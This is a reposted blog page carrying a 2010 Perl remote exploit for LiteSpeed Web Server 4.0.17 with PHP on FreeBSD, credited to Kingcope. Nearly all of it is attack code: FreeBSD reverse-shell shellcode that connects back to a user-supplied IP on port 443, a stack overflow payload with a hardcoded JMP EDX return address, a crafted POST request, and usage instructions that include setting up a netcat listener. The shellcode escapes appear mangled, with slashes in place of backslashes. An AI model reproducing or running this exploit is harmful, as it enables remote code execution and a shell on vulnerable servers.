LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

最新推荐文章于 2025-04-23 22:16:24 发布

Yatere

最新推荐文章于 2025-04-23 22:16:24 发布

阅读量914

点赞数

分类专栏： Web 服务端文章标签： freebsd server php web socket linux

Web 服务端专栏收录该内容

19 篇文章

订阅专栏

备份存档..

# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD # bug discovered & exploited by Kingcope # # Dec 2010 # Lame Xploit Tested with success on # FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 # FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 # FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86 # can be used against the admin interface (port 7080), too # Xploit only works on default lsphp binary not the compiled version # # this should be exploitable on linux too (on the compiled SAPI version) # the shipped linux version of lsphp has stack cookies enabled, # which could be brute forced if there wasn't a null put at the end of # the exploit buffer. The compiled SAPI version is exploitable, but then # the offsets differ from box to box, so this time FreeBSD targets only. # thus on linux this is very tricky to exploit. # this is a proof of concept, don't try this on real boxes # see lsapilib.c line 1240 (http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz) use IO::Socket; $|=1; #freebsd reverse shell port 443 #setup a netcat on this port ^^ $bsdcbsc = # setreuid, no root here "/x31/xc0/x31/xc0/x50/x31/xc0/x50/xb0/x7e/x50/xcd/x80". # connect back :> "/x31/xc0/x31/xdb/x53/xb3/x06/x53". "/xb3/x01/x53/xb3/x02/x53/x54/xb0". "/x61/xcd/x80/x31/xd2/x52/x52/x68". "/x41/x41/x41/x41/x66/x68/x01/xbb". "/xb7/x02/x66/x53/x89/xe1/xb2/x10". "/x52/x51/x50/x52/x89/xc2/x31/xc0". "/xb0/x62/xcd/x80/x31/xdb/x39/xc3". "/x74/x06/x31/xc0/xb0/x01/xcd/x80". "/x31/xc0/x50/x52/x50/xb0/x5a/xcd". "/x80/x31/xc0/x31/xdb/x43/x53/x52". "/x50/xb0/x5a/xcd/x80/x31/xc0/x43". "/x53/x52/x50/xb0/x5a/xcd/x80/x31". "/xc0/x50/x68/x2f/x2f/x73/x68/x68". "/x2f/x62/x69/x6e/x89/xe3/x50/x54". "/x53/x50/xb0/x3b/xcd/x80/x31/xc0". "/xb0/x01/xcd/x80"; sub usage() { print "written by kingcope/n"; print "usage:/n". "litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>/n/n". "example:/n". "perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php/n/n"; exit; } if($#ARGV ne 3) { usage; } $target = $ARGV[0]; $port = $ARGV[1]; $cbip = $ARGV[2]; $file = $ARGV[3]; ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip")); substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4); #my $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => 8088, # Proto => 'tcp'); #$a = "A" x 500; #print $sock "POST /phpinfo.php HTTP/1.1/r/nHost: 192.168.2.5/r/n/r/n"; #$x = <stdin>; #$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE #$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE $ret = pack("V", 0x080F40CD); # JMP EDX lsphp my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $port, Proto => 'tcp'); $a = "A"x 263 . "AAAA"x 6 . $ret . "C"x 500; $sc = "/x90"x 3000 . $bsdcbsc; print $sock "POST //x90/x90/x90/x90/x90/x90/xeb/x50/../$file? HTTP/1.1/r/nHost: $target/r/nVVVV: $sc/r/n$a KINGCOPEH4XXU:/r/n/r/n"; while(<$sock>) { print; }